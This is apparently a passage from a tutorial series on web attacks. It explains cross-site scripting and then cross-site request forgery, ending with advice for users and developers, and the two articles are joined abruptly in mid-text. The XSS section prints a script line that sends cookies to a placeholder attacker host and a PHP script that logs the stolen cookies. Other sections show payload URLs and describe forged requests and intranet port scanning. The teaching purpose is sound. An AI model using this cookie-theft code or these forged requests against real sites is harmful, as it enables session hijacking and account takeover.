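  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Vulnerable: user input becomes part of the page's markup.
function renderHelloUnsafe(name) {
  return '<p>Hello, ' + name + '</p>';
}

// Safer: user input is escaped, so the browser shows it as plain text.
function renderHelloSafe(name) {
  return '<p>Hello, ' + escapeHtml(name) + '</p>';
}

const input = '<b>Hacked</b>'; // hypothetical tampered value of "name"
console.log(renderHelloUnsafe(input)); // the tag reaches the browser intact
console.log(renderHelloSafe(input));   // the tag arrives as &lt;b&gt;...
```

The escaped version still displays whatever the visitor typed, but the browser no longer treats any of it as markup.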
As in most cases, the main aim of an XSS attack is to steal the user’s authentication cookie. Shown below is a typical XSS attack attempt that has been done by posting malicious JavaScript to an online message board, and grabbing the user’s cookie.
<script>document.location="http://attackerserver/cookie.php?c="+document.cookie</script>
When victims click on the link containing this malicious code, they might get redirected to the home page, but their cookies will be sent to the cookie.php ‘cookie fetcher’ PHP script on the attacker’s server. A typical cookie fetcher script might look like what’s shown below:
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: '.$ip.'
Date and Time:
'.$date.'
Referer: '.$referer.'
');
fclose($fp);
header("Location: http://www.vulnerablesite.com");
?>
This file retrieves the cookies and appends them to a cookies.html file on the attacker’s server. Other details saved at the same time include the IP address of the victim’s Net connection, the date and time at which the cookie was fetched, and the HTTP referrer, i.e., the page on which the victim clicked the malicious link to the attacker’s cookie.php. With this information, the attacker can then connect to the board website, supplying the captured cookie, and thus pretend to be the victim.
Now, most savvy victims get suspicious when they are redirected to the home page, or see anything unusual that is not part of the Web application’s normal execution. For such victims, attackers mostly prefer to have their attack script load the cookie fetcher’s URL in a hidden IFRAME, so that the visible page never changes.
When victims open a message with such a script in the body, they experience nothing unusual in the application’s normal behaviour; yet, their cookies are sent to cookie.php on the attacker’s server. This is how a typical XSS attack is done.
Types of XSS vulnerabilities
Most XSS vulnerabilities are classified into three types, based on how the Web application processes the code that the attacker has injected. These types are:
Persistent or stored vulnerabilities
Non-persistent or reflected vulnerabilities
DOM-based or local vulnerabilities
Let’s look at each of these in turn.
Persistent or stored vulnerabilities
Figure 3 : An attack based on a persistent vulnerability
The persistent XSS vulnerability is the most powerful and effective of all. It exists when data that’s provided to a Web application by a user is first stored persistently on the server (in a database, file system, or other storage), and later displayed to users in a Web page without being properly sanitised. The attack scenario on an online message board, given above, is a classic example of this. An attack based on a persistent vulnerability is visualised in Figure 3. The procedure is that the attacker first injects a malicious script through an input Web form. This is then stored by the server in its database. When any user requests the page, the malicious script is rendered into it. Anyone who clicks the link (or merely views the message, in case of the IFRAME-based attack) becomes a victim, as the malicious script is executed in the victim’s browser, passing the authentication cookies back to the attacker. This type of vulnerability is very effective, since the attacker can target several users of the server—whoever clicks on the link or message.
Non-persistent or reflected vulnerabilities
The non-persistent XSS vulnerability is by far the most widely exploited. This type of XSS vulnerability is commonly triggered by server-side scripts that use non-sanitised user-supplied data when rendering the HTML document. For example, an attacker finds an XSS vulnerability in a Web application, where the application’s script displays the criteria used in the website query, as well as the results for the query. The usual URL in the browser might be http://www.example.com/search.php?query=products. Normally, this link would display products available from the website. Once the attackers find the vulnerability, in an effort to hijack the victim’s credentials, they might post a modified link (which changes the known variables) to the victim:
http://www.example.com/search.php?query=<script>alert(document.cookie)</script>
Clicking this link will cause the victims’ browser to pop up an alert box showing their current set of cookies. This particular example is harmless; an attacker can do much more damage, including stealing passwords, resetting the victim’s home page, or redirecting the victim to another website, by using modified JavaScript code. A visualisation of an attack using a reflected vulnerability is shown in Figure 4.
Now, embedding such bulky scripts might draw the victim’s attention, so attackers simply convert them into hexadecimal (percent-encoded) form using one of the many converters available, such as http://code.cside.com/3rdpage/us/url/converter.html. Moreover, if the malicious script is quite big, then URL-shortening services like TinyURL are used to create a short URL that maps to the long one.
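Hex encoding hides a payload from the eye, not from the browser, and it is easy to undo before clicking. A minimal sketch, using JavaScript’s built-in URL class and decodeURIComponent; the helper name revealQuery and the sample link are made up for illustration:

```javascript
// Return the decoded query string of a link, so that it can be inspected
// before anyone clicks on it.
function revealQuery(link) {
  const query = new URL(link).search.slice(1); // drop the leading '?'
  return decodeURIComponent(query);
}

// %3C is "<", %3E is ">", %28 and %29 are the parentheses, %2F is "/".
const disguised =
  'http://www.example.com/search.php?query=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E';
console.log(revealQuery(disguised));
```

A shortened URL needs one more step, since the long form is only revealed by the shortening service’s redirect.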
DOM-based or local vulnerabilities
DOM-based XSS vulnerabilities exist within the sites’ HTML (as a static script) and can be exploited non-persistently. A brief example of a DOM-based XSS vulnerability would be a static script embedded in a page, which, when executed, uses a DOM function like document.write to display the results of a POST variable. The only real difference in the DOM-based vulnerability is that the server doesn’t send back the results; instead, the DOM parses the code locally, and the malicious script is executed with the same privilege as the browser on the victim’s machine. Consider a scenario where a vulnerable site has the following content (named, for example, http://www.example.com/welcome.html):
<script>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</script>
Welcome to our site
…
Normally, the code in this page would welcome the user, if invoked with the following URL:
http://www.example.com/welcome.html?name=Joe
However, a little tampering with this URL results in displaying the users’ cookies in their browser, if they click the URL hyperlink:
http://www.example.com/welcome.html?name=<script>alert(document.cookie)</script>
What happens is that to open this URL, the victim’s browser sends an HTTP request to www.example.com. It receives the above (static) HTML page. The victim’s browser then starts parsing this HTML into DOM. In this case, the code references document.URL, and so, a part of this string is embedded at parsing time in the HTML. It is then immediately parsed, and the malicious JavaScript code passed through the URL is executed in the context of the same page, resulting in an XSS attack.
You might realise here that the payload did arrive at the server (in the query part of the HTTP request), and so it could be detected just like any other XSS attack—but attackers even take care of that with something like the following:
http://www.example.com/welcome.html#name=<script>alert(document.cookie)</script>
Notice the hash sign (#) used here; it tells the browser that everything beyond it is a fragment, and not part of the query. IE (6.0) and Mozilla do not send the fragment to the server, and for these browsers, the server would only see http://www.example.com/welcome.html, with the payload remaining hidden.
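The split between what travels to the server and what stays in the browser can be checked with the standard URL class, which is available in browsers and in Node. This is only a sketch; the function name splitRequest is hypothetical, and a harmless name=Joe stands in for the payload.

```javascript
// Split a URL into the part the browser puts in the HTTP request line
// and the fragment, which never leaves the client.
function splitRequest(link) {
  const url = new URL(link);
  return {
    sentToServer: url.pathname + url.search,
    keptInBrowser: url.hash,
  };
}

console.log(splitRequest('http://www.example.com/welcome.html?name=Joe'));
console.log(splitRequest('http://www.example.com/welcome.html#name=Joe'));
```

In the second case, the server log shows only /welcome.html, so server-side filters and intrusion detection never get a chance to see the value.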
Latest trends in XSS
Meta-information XSS (miXSS)
This new type of XSS vulnerability has emerged recently, and exploits commonly used network administration utilities. It is found in those services that utilise valid user-provided input to gather data and display it for the user. It is in this data that the cross-site scripting occurs. Attackers can extract information about network administration utilities. Websites that allow you to perform DNS resolution, and websites that verify SPF records are more vulnerable to miXSS attacks. To learn more about miXSS, check the resources at the end of this article.
XSS Shell
The XSS Shell is a tool that can be used to set up an XSS channel between a victim and an attacker, so that an attacker can control a victim’s browser, sending it commands. The communication is bi-directional.
XSS Tunnel
This is a GPL-licensed open source application written in .NET; it is a standard HTTP proxy that sits on the attacker’s system. It enables tunnelling of HTTP traffic through an XSS channel, so that virtually any application that supports HTTP proxies can be used.
XSS causing DDoS attacks
Recent trends have seen attackers using XSS-vulnerable sites as an initiator step in performing DDoS (Distributed Denial of Service) attacks. They trick users into downloading and installing plug-ins. When the user clicks the download link, besides the plug-in, a worm or bot (in most cases) gets installed in the background. This worm/bot can give the attacker full privileges over the user’s system, and the attacker can then use it to perform DoS attacks, or to spread the botnet.
Botnets
A botnet is an alliance of interconnected computers infected with some malicious software agent (called a bot). Bots are commanded by an operator, and can typically be ordered to send spam mails, harvest information such as licence keys or banking data on compromised machines; or launch distributed denial-of-service (DDoS) attacks against arbitrary targets.
Securing a server against XSS
Cross-site scripting is a potential risk for most Web servers and browsers. Attackers are constantly coming up with new types of this attack, but the following best practices can help you secure your system against attackers.
For clients or users
Take a serious and suspicious view of e-mails or spam mail that contain big, bulky and suspicious URLs. Don’t click such links, even if they are to known and trusted sites. Many of these messages try various tricks to coax you into clicking the link. Some of these include offers to make you financially strong and independent; others threaten that you will lose your account on a (legitimate) website unless you “Confirm your username and password immediately.” Think hard and deep before you click such links, especially with the knowledge you have gained from this article. Obviously, exercise the same level of caution on online message boards and social networking sites as well.
Recent versions of Mozilla Firefox display good security features. For example, Firefox automatically encodes < and > (into %3C and %3E, respectively) in the document.URL property, when the URL is not directly typed into the address bar. Therefore, it is not vulnerable to the DOM-based attack shown above. For additional security, install browser add-ons (extensions) such as NoScript, FlashBlock, and the Netcraft toolbar.
You could also try using the Google Chrome browser, which is released with integrated XSS protection.
If you run into a doubtful link that you still want to open, and you don’t use Firefox with NoScript, disable JavaScript, Java (and ActiveX, if you’re on Windows) before you click the link. Alternatively, visit the website by typing its address directly into your browser.
If a link is to a URL-shortening service like ‘tiny’, ‘tinyurl’, ‘bit.ly’, ‘is.gd’, ‘shorturl’, ‘snipurl’ etc, be careful when clicking the link. You may even want to install a second browser for ‘untrusted’ sites; in this browser, do not sign in to any of your trusted and valuable sites, but use it to visit suspicious URLs. If there is actually an attack behind the URL, even if successful, it will probably not net the attacker any useful cookies.
For developers
The best way to check your website for vulnerabilities is to run a Web application security scan against a local copy of it. The best FOSS project available for this is Nikto, which you can get at http://www.cirt.net/nikto2.
The next preferred option is to properly escape all untrustworthy data, based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications. See the OWASP XSS Prevention Cheat Sheet linked in the Resources section for more information about data escaping techniques.
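The reason the context matters is that each one has its own special characters. The sketch below shows one possible encoder for three of the contexts named above (HTML body or quoted attribute, URL parameter, and JavaScript string). The function names are hypothetical, and this is an illustration of the idea rather than a replacement for a maintained encoding library or the OWASP cheat sheet.

```javascript
// HTML body and quoted-attribute context: escape the markup metacharacters.
function forHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// URL context: percent-encode a value before placing it in a query string.
function forUrlParam(text) {
  return encodeURIComponent(String(text));
}

// JavaScript string context: JSON.stringify adds the quotes and escapes
// quotes and backslashes; "<" is rewritten as well, so that a "</script>"
// inside the data cannot close the surrounding script block.
function forJsString(text) {
  return JSON.stringify(String(text)).replace(/</g, '\\u003c');
}

const value = '"><script>alert(1)</script>'; // hypothetical hostile input
console.log('<p>' + forHtml(value) + '</p>');
console.log('<a href="/search?q=' + forUrlParam(value) + '">again</a>');
console.log('<script>var q = ' + forJsString(value) + ';</script>');
```

Using the HTML encoder inside a script block, or the URL encoder inside an attribute, would leave gaps; that is why the escaping has to be chosen per context.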
Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users. When filtering dynamic content, select the set of characters that is known to be safe, instead of trying to exclude the set of characters that might be bad. This is preferable because it’s unclear whether there could be any other characters or character combinations that can be used to expose other vulnerabilities.
Check all headers, cookies, query strings, form and hidden fields, and all other parameters for HTML tags that can carry or load active content, such as script tags.
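The ‘known to be safe’ approach to filtering can be sketched as a single allow-list check applied to every parameter of a request. The character set, the length limit and the function names below are assumptions made for the example; a real application would pick the narrowest set each field can live with.

```javascript
// Accept a value only if every character is in a known-safe set:
// letters, digits, space and a few punctuation marks, 1 to 64 characters.
const SAFE_TEXT = /^[A-Za-z0-9 .,_-]{1,64}$/;

function isSafe(value) {
  return typeof value === 'string' && SAFE_TEXT.test(value);
}

// Check every parameter of a request, not just the obvious ones.
// Returns the names of the parameters that failed the check.
function rejectedParams(params) {
  return Object.keys(params).filter((name) => !isSafe(params[name]));
}

const request = {
  name: 'Arpit Bajpai',
  query: '<script>alert(document.cookie)</script>',
  page: '2',
};
console.log(rejectedParams(request)); // [ 'query' ]
```

Because the check lists what is allowed rather than what is forbidden, a new trick character is rejected by default instead of slipping through.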
document.badform.submit()
The CSRF attack using the HTTP POST method is summarised in Figure 2. Please note that this scenario was used just to explain CSRF clearly, and that no bank is careless enough to let such an attack happen. I reiterate that you should not try any of these steps on any public server.
Figure 2: CSRF attack using HTTP POST
Scenario 2
Another CSRF attack scenario exploits the firewall Web management system. This is again based on session cookies. Let’s suppose the firewall Web management application has a function that allows an authenticated user to delete a rule, specified by its positional number, or all the rules of the configuration, if the user enters ‘*’. For example, a valid URL to delete a single rule, number 5, would be:
http://www.example.com/firemange/delete?rule=5
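The malicious HTML for a CSRF attack using HTTP GET only has to make the browser request the same URL with rule=* (for example, from the SRC attribute of an image tag) somewhere in an otherwise ordinary page: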
……
……
….
Scenario 3
Routers for private use, like popular DSL routers, come with a preconfigured IP address for the LAN interface (e.g., 192.168.0.1), which most users do not change. Thus, the host-part of the URL is known in most cases. Attackers are familiar with the workings and URLs of most popular routers, and if they can social-engineer the victim into clicking a malicious link, this will (for example) enable the remote Web management on port 8080, allowing it to be administered from any computer on the Internet. The malicious Web page only has to make the victim’s browser request the corresponding URL on the router, for example through a hidden image or IFRAME.
The attacker can also change the router’s default account name, and could also compromise network printers—so if you have a DSL/home router left at its default settings, change the preconfigured IP and default passwords right now!
Using well-known URLs for Web applications, an attacker can also reset your Web-based account passwords, tamper with your corporate Web-mail, and delete or modify accounts in Web applications. CSRF is a serious vulnerability, and cannot be taken lightly.
The differences between XSS and CSRF
Though CSRF seems similar to Cross-Site Scripting (XSS) at first, the two are completely different attack vectors. Where XSS aims at inserting active code in an HTML document to either abuse client-side active scripting holes, or to send privileged information (e.g., authentication/session cookies) to an unknown evil site, CSRF aims to perform unwanted actions on a site where the victim has some prior relationship and authority. Moreover, where XSS seeks to steal your online trading cookies so that an attacker can manipulate your account, CSRF seeks to use the victims’ cookies to force them to execute a trade without their knowledge or consent. While XSS attacks exploit the trust that a user has in the website, CSRF attacks exploit the trust that the website has in its user.
Types of CSRF attacks
CSRF attacks can be divided into two major categories—reflected and stored/local.
Reflected CSRF attacks
In a reflected CSRF attack, the attacker uses a system outside the application to expose the victim to the exploit link or content. This can be done using a blog, an email message, an instant message, a message-board posting, or even a flyer posted in a public place with a URL that a victim types in.
Reflected CSRF attacks will frequently fail, as users may not be currently logged into the target system when the exploits are tried. The trail from a reflected CSRF attack, however, may be under the attacker’s control, and could be deleted once the exploit is completed. The three attack scenarios we looked at earlier are examples of reflected CSRF attacks.
Local/stored CSRF attacks
A stored/local CSRF attack is one where the attacker can use the application itself to provide the victim the exploit link, or other content which directs the victim’s browser to perform attacker-controlled actions in the application. Stored CSRF vulnerabilities are more likely to succeed, since the user who receives the exploit content is almost certainly currently authenticated to perform actions.
Stored CSRF attacks also have a more obvious trail, which may lead back to the attacker, since the origin of the malicious HTTP request is hosted in the attacked website. Examples include bulletin boards and social sites where users are allowed to post images with foreign URL sources. These are harder to find and destroy.
Why CSRF works
To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications:
Implicit authentication
Explicit authentication
Implicit authentication by Web browsers
Figure 3: Typical HTTP authentication
Figure 4: Typical cookie authentication
Figure 5: Typical IP-based authentication
Implicit authentication by Web browsers occurs when the browser automatically includes authentication information in HTTP requests; in other words, the Web browser itself is responsible for tracking the authenticated state. Widely used implicit authentication mechanisms in the browser include:
HTTP authentication: This enables the Web server to request authentication credentials from the browser in order to restrict access to certain Web pages. In all the three methods (basic, digest and NTLM), the initial authentication process undergoes the same basic steps. Figure 3 shows a simplified version of the authentication process. If the client requests further restricted resources that lie in the same authentication realm, the browser includes the credentials automatically in the request.
Cookies: Web browser cookie technology provides persistent data storage on the client side, which is often used by today’s Web applications to store authentication tokens. After a successful login procedure, the server sends a cookie to the client. Every subsequent HTTP request that contains this cookie is automatically regarded as authenticated. The typical cookie authentication process is shown in Figure 4.
Client-side SSL authentication: The Secure Socket Layer (SSL), and its successor, the Transport Layer Security (TLS) protocol, enable cryptographically authenticated communication between the Web browser and the Web server. To authenticate, X.509 certificates and digital signature schemes are used.
What all these schemes have in common is that after a successful initial authentication, tokens are sent automatically in further requests, without asking the user for permission—this is what makes Web applications that use these authentication techniques, vulnerable to CSRF attacks.
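A toy model of the browser’s cookie handling shows why this matters. The class below is a deliberate simplification (it ignores cookie attributes such as path and expiry, and all names in it are hypothetical); its only purpose is to show that the page which triggered a request plays no part in deciding whether the cookie is attached.

```javascript
// A toy cookie jar: cookies are stored per host and attached to every
// request for that host, whichever page triggered the request.
class CookieJar {
  constructor() {
    this.cookies = new Map(); // host -> cookie string
  }

  store(host, cookie) {
    this.cookies.set(host, cookie);
  }

  // Build the headers the browser would send for a request to `url`.
  // `initiatingPage` is accepted only to show that it is never consulted.
  headersFor(url, initiatingPage) {
    const host = new URL(url).host;
    const cookie = this.cookies.get(host);
    return cookie ? { Cookie: cookie } : {};
  }
}

const jar = new CookieJar();
jar.store('fictitiousbank', 'PHPSESSIONID=abc123'); // set at login

// A request made from the bank's own page...
console.log(jar.headersFor('http://fictitiousbank/transfer.cgi', 'http://fictitiousbank/home'));
// ...and one triggered by a page on an unrelated site carry the same cookie.
console.log(jar.headersFor('http://fictitiousbank/transfer.cgi', 'http://attackerserver/page.html'));
```

From the server’s side, the two requests are indistinguishable unless the application adds a check of its own.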
Implicit authentication by IP address
This special case of implicit authentication is often found on intranets. Here, the authentication is based on certain IP (or MAC) addresses from which requests are made to the application. Shown in Figure 5 is a typical IP-based authentication, in which only users within the intranet are allowed to access the intranet server, and requests from all other IP addresses are denied access.
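An IP-based check of this kind might look like the sketch below. The network 192.168.0.0/24 and the function names are assumptions for the example, and the address parsing does no validation. The point to notice is that a forged request sent by an intranet user’s own browser arrives from an inside address, and so passes the check.

```javascript
// Convert a dotted-quad IPv4 address to an unsigned 32-bit number.
// No validation is done; this is a sketch, not a parser.
function ipToNumber(ip) {
  return ip.split('.').reduce((acc, part) => acc * 256 + Number(part), 0);
}

// True if `ip` lies inside the network `base`/`prefixLength`.
function inNetwork(ip, base, prefixLength) {
  const size = 2 ** (32 - prefixLength); // number of addresses in the network
  const start = Math.floor(ipToNumber(base) / size) * size;
  const n = ipToNumber(ip);
  return n >= start && n < start + size;
}

// The server trusts the source address alone; no credentials are checked.
function isAuthenticated(remoteAddress) {
  return inNetwork(remoteAddress, '192.168.0.0', 24);
}

console.log(isAuthenticated('192.168.0.42')); // true
console.log(isAuthenticated('203.0.113.7'));  // false
```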
Explicit authentication is safer
In this type of authentication, the Web application (or the Web server) is itself responsible for tracking the authenticated state of the user. This is generally done in two ways:
URL rewriting, in which the session tokens are included in the URL for every request sent to the server; the URL is generated by the Web application/Web server, and does not require the browser to pass authentication tokens along with the request.
Form-based session tokens, in which hyperlinks are replaced with HTML forms that contain session identifiers in hidden form fields.
Though explicit authentication is immune to CSRF, it has other problems, which we will discuss in a while.
The main reason that CSRF works is that Web applications using implicit authentication mechanisms do not verify that a state-changing request was created within the Web application. Because of the implicit authentication of the user, the attacker can easily control the user’s session.
Another underlying factor that enables CSRF attacks is the application’s use of predictable URL/form actions in a repeatable way.
Some myths about CSRF
Myth: CSRF is just a special case of XSS
Fact: CSRF is a separate vulnerability from XSS, with a different solution. XSS protection won’t stop CSRF attacks, though it is also important to guard against XSS on a priority basis.
Myth: Applications aren’t vulnerable to CSRF if they use multi‐page forms to perform actions.
Fact: While multi‐page forms certainly make exploitation harder, attackers usually can exploit them. Attackers frequently use multiple IFRAMEs when building multi‐page form CSRF exploits.
Myth: CSRF is solvable by forcing all sensitive requests over POST while denying GETs.
Fact: While POSTs can be more difficult to exploit, they certainly are exploitable, as shown in Scenario 1. Using POST rather than GET can provide a defence only against local CSRF attacks; POST requests can still be created with hidden IFRAMEs on foreign Web pages. Forms can mislead users about what they are sending, and where, and scripting can lead to automatic submission. JavaScript is fully capable of sending POST requests via form submissions.
Myth: CSRF can be prevented by filtering based on the referrer header.
Fact: This option is very unreliable, since attackers can easily block the sending of the referrer header, through the use of certain browser and Flash exploits. Some browsers also omit the referrer header when they are being used over SSL. Moreover, many firewalls and anti-spyware software often drop referrers, in their default mode, without letting users know. But, using referrers can be viewed as another incremental roadblock.
Myth: Browser enforcement of Same Origin Policy (SOP) prevents CSRF.
Fact: Browsers that implement SOP will prevent scripts from accessing the DOM of a page originating from another domain, or accessing cookies that originate from other domains. However, they do not prevent scripts from sending requests to other domains. Furthermore, when a script sends a request to another domain (or when an IMG tag’s SRC attribute is set to another domain), the browser will execute the request, and will also send any cookies it has that are valid for the domain, along with the request. (See box on SOP).
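For reference, the ‘origin’ that SOP compares is the combination of scheme, host and port. A minimal sketch of that comparison, using the standard URL class (the function name sameOrigin is hypothetical):

```javascript
// Two URLs share an origin only if scheme, host and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

console.log(sameOrigin('http://www.example.com/a.html', 'http://www.example.com/dir/b.html')); // true
console.log(sameOrigin('http://www.example.com/', 'https://www.example.com/'));     // false (scheme)
console.log(sameOrigin('http://www.example.com/', 'http://www.example.com:8080/')); // false (port)
console.log(sameOrigin('http://www.example.com/', 'http://attackerserver/'));       // false (host)
```

This test decides what a script may read. It is not applied to requests a page merely sends, which is why it offers no protection against CSRF.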
Advanced uses of CSRF
The following advanced techniques that use CSRF attacks have been observed in recent years.
Bypassing CSRF protections with click-jacking: This recently-evolved technique can be used to bypass CSRF protection and submit POST method-based forms with attacker controlled data, using click-jacking. See the box on click-jacking for more information.
The best example of this attack is exploiting e-mail update services. Such services are quite common in Web applications. In this, the attacker manages to force victims to update their e-mail IDs with that of the attacker, so that the attacker can then compromise the victims’ account by performing a password reset. This attack can occur even if the Web application contains tokens for CSRF protection. A cool and elaborate description of this is available at http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html. Do check it out for more information.
Using XSS to bypass CSRF protection: This technique applies to websites that have an application that guards against CSRF, yet have pages that are vulnerable to XSS attacks. It’s a big misconception that guarding against CSRF will also secure the application against XSS. Using XSS, attackers can bypass the CSRF protection, and can automate any action that can be done on the application, without problems. Attackers simply read the site-generated token from the response, and include that token with a forged request. One such example of this is attackers exploiting an XSS vulnerability of a website to add a fake user with administrator privileges, when the site is secured against CSRF attacks. A good discussion on this type of attack (with code) is available in the Further Reading section. Please do spend some time on it. It was by using an XSS vulnerability that the Samy worm bypassed MySpace’s CSRF protection in 2005, infecting over one million accounts within just 20 hours of its release.
Attacking intranets: Exploiting intranets involves CSRF attacks through IP-based implicit authentication schemes. Most intranet Web servers are vulnerable to this type of attack. The fact that many intranet servers continue to use default passwords, leave hosts unpatched, and blindly rely on perimeter firewalls to block external attacks has given rise to intranet vulnerabilities to CSRF and malicious JavaScript. This malicious JavaScript, once behind the firewall, can attack the intranet; since it is independent of the operating system and the Web browser, it is hard to defend against.
One such example is port scanning of the intranet Web server, using JavaScript and CSRF. The JavaScript constructs a local (intranet) URL that contains the IP address and the port to be scanned. The script then includes an element in the Web page (such as an image, IFRAME or remote script) that is addressed by the URL. Also, using JavaScript time-out functions, and event handlers like OnLoad and OnError, the script can decide whether the host exists and whether the given port is open. If a time-out occurs, the host probably does not exist. An OnLoad event indicates that the host probably runs a Web server, and an OnError event indicates that the host exists, but the port is closed. The typical attack scenario is shown in Figure 6. In this scenario, the attacker forces/convinces the intranet user to visit a malicious page on the attacker’s server, which carries the scanning script in a hidden IFRAME.
As soon as the user loads this page, the information about the existence of the Web server is sent to the attacker in the form of errors. Apart from this, the attacker can fingerprint applications/routers/network devices, and also might locate HTTPS or development servers by varying the ports.
Guarding against CSRF attacks
Following a few guidelines for both users and developers can help to curb CSRF attacks a lot.
For users
Log out of the important Web application when you have completed your work/transactions. Do not open any non-trusted site in the same browser while logged in to the important site. If you need to do this for some reason, use a separate browser for the untrusted site(s).
Use Mozilla Firefox with the NoScript add-on, which allows JavaScript, Java and other executable content to run only from trusted domains of your choice. It is one of the best defences available for protection against XSS, CSRF and click-jacking attacks. Also consider using the CsFire add-on, which autonomously protects you against CSRF and other dangerous or malicious cross-domain requests. CsFire removes authentication information (cookies and authentication headers) from such requests.
Use multiple browsers and segregate your browsing into trusted/sensitive sites/applications and untrusted/less important sites/applications. For example, use Firefox, with the NoScript and Adblock Plus (ABP) add-ons installed, to browse trusted/sensitive sites/applications. In NoScript, white-list trusted sites so JavaScript from those sites will work. Set up ABP to block known malicious sites; use the auto-configuration URL at the end of http://adblockplus.org/blog/blocking-malicious-sites-with-adblock-plus to add the filter list to ABP. For other (untrusted) sites, install another browser like Google Chrome, Chromium or Opera. If you’re not certain about off-site links encountered in trusted sites (e.g., someone mails you a link to your Gmail, which you’re viewing in Firefox), then instead of visiting it in Firefox, drag the link from the page in Firefox to Chrome/Chromium’s tab bar (or copy/paste it), to have it open in a new tab in Chromium. Since only the link URL is transferred to the other browser, and any implicit-authentication tokens remain in Firefox, this is a safer practice.
Regularly deleting long-duration cookies (those which are set to expire after an inordinately long time) will also help mitigate the threat.
If possible, don’t store user-names and passwords in the browser’s password manager (for example, see http://lwn.net/Articles/211875/ ).
For developers
The best defence against CSRF attacks is unpredictable tokens: pieces of data that the server can use to validate the request, and which an attacker can’t guess. For example, an important request could contain a digest of the user’s session credential, which is different for every user. And, for a little extra security, add a timestamp to the token, to limit the window of opportunity, as shown in the POST request below:
POST http://fictitiousbank/transfer.cgi HTTP/1.1
Host: fictitiousbank
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.6.2
Cookie: PHPSESSIONID=7757ADD8766d455NFJJ23875JBJKBFR

from=35367021&to=48412334&amount=5000&date=05072010&token=40E03EF45T443W20K4IC567HY4334DD44&timestamp=1184001456
The tokens used should also be cryptographically very strong.
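One way to build such a token is sketched below for Node.js. Note the substitution: instead of a plain digest of the session credential, the sketch uses an HMAC keyed with a server-side secret, so that the token can’t be recomputed by anyone who merely learns the session ID. The secret handling, the 15-minute lifetime and the function names are assumptions made for the example.

```javascript
const crypto = require('crypto');

// Server-side secret; generated at start-up here, which is an assumption
// for the sketch (a real deployment would manage it explicitly).
const SECRET = crypto.randomBytes(32);

// Token = HMAC-SHA256(secret, sessionId + ':' + timestamp), hex-encoded.
function makeToken(sessionId, timestamp) {
  return crypto.createHmac('sha256', SECRET)
    .update(sessionId + ':' + timestamp)
    .digest('hex');
}

// Accept a request only if the token matches and is at most
// maxAgeSeconds old.
function verifyToken(sessionId, timestamp, token, nowSeconds, maxAgeSeconds) {
  if (nowSeconds - timestamp > maxAgeSeconds || timestamp > nowSeconds) {
    return false; // expired, or dated in the future
  }
  const expected = Buffer.from(makeToken(sessionId, timestamp), 'hex');
  const supplied = Buffer.from(String(token), 'hex');
  // timingSafeEqual throws on a length mismatch, so compare lengths first.
  return expected.length === supplied.length &&
    crypto.timingSafeEqual(expected, supplied);
}

const session = '7757ADD8766d455NFJJ23875JBJKBFR';
const issuedAt = Math.floor(Date.now() / 1000);
const token = makeToken(session, issuedAt);
console.log(verifyToken(session, issuedAt, token, issuedAt + 60, 900));      // true
console.log(verifyToken(session, issuedAt, 'deadbeef', issuedAt + 60, 900)); // false
console.log(verifyToken(session, issuedAt, token, issuedAt + 3600, 900));    // false (too old)
```

The server embeds the token and timestamp in each form it generates, and refuses any state-changing request whose pair does not verify.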
Limit the time for which the user’s credentials are valid. By enforcing inactivity time-outs, you reduce chances of CSRF attacks.
Password re-verification should be given priority over single-sign on. In this method, the users must type in their passwords again when accessing particularly critical functions.
Switching over to URL rewriting is not recommended since, when URLs contain session tokens, the tokens could be leaked via proxy-logs/referrers. Moreover, they are also not very helpful against local/stored attacks, since all URLs produced by the application contain the token.
Do not rely (solely) on referrer checking, as techniques exist to selectively create HTTP requests without referrers.
For protection against local/stored attacks, mirror all foreign content, and don’t allow arbitrary URLs in your Web application. Moreover, local attacks can be mitigated if you only serve images from your own servers (as social sites and forums do) and don’t allow users to store arbitrary data on your servers.
When building defences against CSRF, you must eliminate XSS vulnerabilities.
Throw as many roadblocks at the attacker as possible, including customised error messages, checks on HTTP referrer headers and Web application firewalls.
Use CAPTCHAs, especially for important transactions, to check whether there’s a human being at the other end, and not an automated attack.
Harden the intranet websites, apply security patches and updates, and change default passwords.
Tools of the security trade
There are Web scanners available, both commercial and FOSS, to test websites for CSRF, but given the complexity of CSRF attacks, they rarely find CSRF vulnerabilities. However, there is some FOSS available to make security work easier:
OWASP CSRF tester: This is basically a JavaEE filter that implements the synchroniser token pattern to mitigate the risk of CSRF attacks. Its documentation can be found at http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project. A PHP implementation of this CSRF guard is available at www.owasp.org/index.php/PHP_CSRF_Guard and a .NET implementation at www.owasp.org/index.php/.Net_CSRF_Guard.
RequestRodeo is an HTTP proxy written in Python, using the Twisted framework, OpenSSL and SQLite. It protects its user against CSRF. It can be found at http://savannah.nongnu.org/projects/requestrodeo/.
For more detailed information on CSRF, and more defences against it, don’t forget to visit the resources below. We will deal with other dangerous attacks on Web applications and Apache in the next article. Always remember: know hacking, but no hacking.
Further reading
http://packetstormsecurity.org/papers/attack/Using_XSS_to_bypass_CSRF_protection.pdf
Visit http://www.secologic.org/
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
http://www.whitehatsec.com/ contains good information both on XSS and CSRF and other attacks.
The author is a FOSS enthusiast, and loves to troubleshoot in the information security domain, while exploring new exploits and system vulnerabilities. You can send your queries and constructive feedback on this article to abajpai75 AT yahoo DOT com.
